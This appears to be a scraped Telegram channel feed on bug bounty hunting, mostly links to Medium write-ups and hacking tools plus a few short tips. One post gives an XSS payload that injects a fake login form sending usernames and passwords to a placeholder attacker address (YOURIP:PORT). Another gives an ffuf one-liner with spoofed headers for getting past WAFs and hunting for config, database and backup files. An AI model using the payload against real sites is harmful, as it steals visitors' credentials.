2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
☄️Subowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc.
🚨https://github.com/ifconfig-me/subowner
💠 Introduction to SQL Injection
🔗 https://hacklido.com/blog/910-introduction-to-sql-injection
Top Hacking Books for 2024 (plus Resources): FREE and Paid
Tue, 17 Sep 2024 12:56:36 GMT
https://medium.com/p/394601c01904
Hunting APIs for Bounties: How to Hack and Win Big in Bug Bounties!: rootspaghetti/hunting-apis-for-bounties-how-to-hack-and-win-big-in-bug-bounties-942d0f4e0885?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@rootspaghetti/hunting-apis-for-bounties-how-to-hack-and-win-big-in-bug-bounties-942d0f4e0885?source=rss------bug_bounty-5
Читать полностью…
a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss '><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
A bypass on GitLab’s Login Email Verification via OAuth ROPC flow.
cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96" rel="nofollow">https://medium.com/@cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96
🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers!
Writeup-Miner is a 👩💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord!
Key Features:
🟢 Scrape Medium posts via RSS feeds
🟢 Store data in MongoDB or .txt format
🟢 Set custom filters to refine content
🟢 Get a real-time notifications via Telegram or Discord
How to Use:
1. Install the tool:
git clone https://github.com/0xSpidey/writeup-miner.git
cd writeup-miner
pip install -r requirements.txt
2. Configure Telegram or Discord notifications:
python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo
3. Sit back and get notified when new content is published!
👩💻 Example Command (Telegram):
python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo
🖥 Explore More Options & Usage:
Discover additional commands, filters, and options on our GitHub page👇
📱Github: 🔗Link
#CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty
🔹 Share & Support Us 🔹
📱 Channel : @bugbounty_tech
Please do boost the channel so that you guys can enjoy other features.
Читать полностью…
Exploring Deserialization Attacks and Their Effects
https://haymiz.dev/security/2024/09/07/deserialization-attacks/
A very easy bug anyone can find: malikirtizameg/a-very-easy-bug-anyone-can-find-8d2b11a768c7?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@malikirtizameg/a-very-easy-bug-anyone-can-find-8d2b11a768c7?source=rss------bug_bounty-5
Читать полностью…
How to Find IDOR Vulnerabilities: A Guide for Bug Bounty Hunters and Developers: https://cyberw1ng.medium.com/how-to-find-idor-vulnerabilities-a-guide-for-bug-bounty-hunters-and-developers-3d2ba2a766f5?source=rss------bug_bounty-5
Читать полностью…
Automating the CORS Vulnerability Scan: https://angixblack.medium.com/automating-the-cors-vulnerability-scan-66d57752cc36?source=rss------bug_bounty-5
Читать полностью…
How i got 100$ bounty: mukkumukku110/how-i-got-100-bounty-b3dd58e82e00?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@mukkumukku110/how-i-got-100-bounty-b3dd58e82e00?source=rss------bug_bounty-5
Читать полностью…
Subdomain Takeovers for Beginners: hichamalmakroudi/subdomain-takeovers-for-beginners-a51ed74db543?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@hichamalmakroudi/subdomain-takeovers-for-beginners-a51ed74db543?source=rss------bug_bounty-5
Читать полностью…
🔖JavaScript for hackers: Learn to think like a hacker
🖥 Book Details: 🔗Link
👤 Author: Gareth Heyes
#infosec #cybersecurity #hacking #pentesting #security #book #pentest #BugBounty #BugBountyBooks
🔹 Share & Support Us 🔹
💬 Channel : @Hide_Club
❎ Penetration Testing Roadmap Public: https://github.com/securitycipher/penetration-testing-roadmap
Читать полностью…
Pentesting for Web Applications
https://www.hackerone.com/penetration-testing/web-applications
How I Utilized AI to Discover an Amazon S3 Bucket Takeover Vulnerability in Red Bull’s Bug Bounty…: mohamedsaqibc/how-i-utilized-ai-to-discover-an-amazon-s3-bucket-takeover-vulnerability-in-red-bulls-bug-bounty-503d3c4d995f?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@mohamedsaqibc/how-i-utilized-ai-to-discover-an-amazon-s3-bucket-takeover-vulnerability-in-red-bulls-bug-bounty-503d3c4d995f?source=rss------bug_bounty-5
Читать полностью…
xss preventing steps from front end.
Input Validation
the web application will not allow us to submit the form if the email format is invalid. This was done with the following JavaScript code:Code: javascriptfunction validateEmail(email) { const re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/; return re.test($("#login input[name=email]").val());}
As we can see, this code is testing the email input field and returning true or false whether it matches the Regex validation of an email format.
☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool.
🔗https://github.com/epinna/tplmap
[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package
p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643" rel="nofollow">https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643
try this amazing FFUF Oneliner that i use mostly to bypass WAfs and for good & refine results for information disclosure bugs. you can use any wordlist:
ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env,.asp,.aspx,.jsp,.gz,.tar,.sql,.db -ac -c -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0" -H "X-Forwarded-For: 127.0.0.1" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-Host: localhost" -t 100 -r -o results.jsonЧитать полностью…
First IDOR
Severity : critical 9-10
Eg : exmaple.com/parameter.aspx?id=4471
SQL Injetion: adhikarisudip869/sql-injetion-f6f5f4291cbc?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@adhikarisudip869/sql-injetion-f6f5f4291cbc?source=rss------bug_bounty-5
Читать полностью…
BugBounty platforms List: loyalonlytoday/bugbounty-platforms-list-ed3a5af3a8a2?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@loyalonlytoday/bugbounty-platforms-list-ed3a5af3a8a2?source=rss------bug_bounty-5
Читать полностью…
Live Bug Bounty & Penetration Testing on Real Websites: Step-by-Step Guide (Part 1): shaikhminhaz1975/live-bug-bounty-penetration-testing-on-real-websites-step-by-step-guide-part-1-971ccc9b9587?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@shaikhminhaz1975/live-bug-bounty-penetration-testing-on-real-websites-step-by-step-guide-part-1-971ccc9b9587?source=rss------bug_bounty-5
Читать полностью…
Hunting for Corporate Accounts: Exploiting IDOR and Parameter Pollution in Web Applications: tusharpuri6/hunting-for-corporate-accounts-exploiting-idor-and-parameter-pollution-in-web-applications-1792294e0c48?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@tusharpuri6/hunting-for-corporate-accounts-exploiting-idor-and-parameter-pollution-in-web-applications-1792294e0c48?source=rss------bug_bounty-5
Читать полностью…
XSS — Cross Site Scripting: codingboltacademy/xss-cross-site-scripting-65e1981817df?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@codingboltacademy/xss-cross-site-scripting-65e1981817df?source=rss------bug_bounty-5
Читать полностью…
😈 [ Scott Sutherland @_nullbind ]
[BLOG] Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation
🔗 https://www.netspi.com/blog/technical-blog/network-pentesting/hijacking-sql-server-credentials-with-agent-jobs-for-domain-privilege-escalation/
🐥 [ tweet ]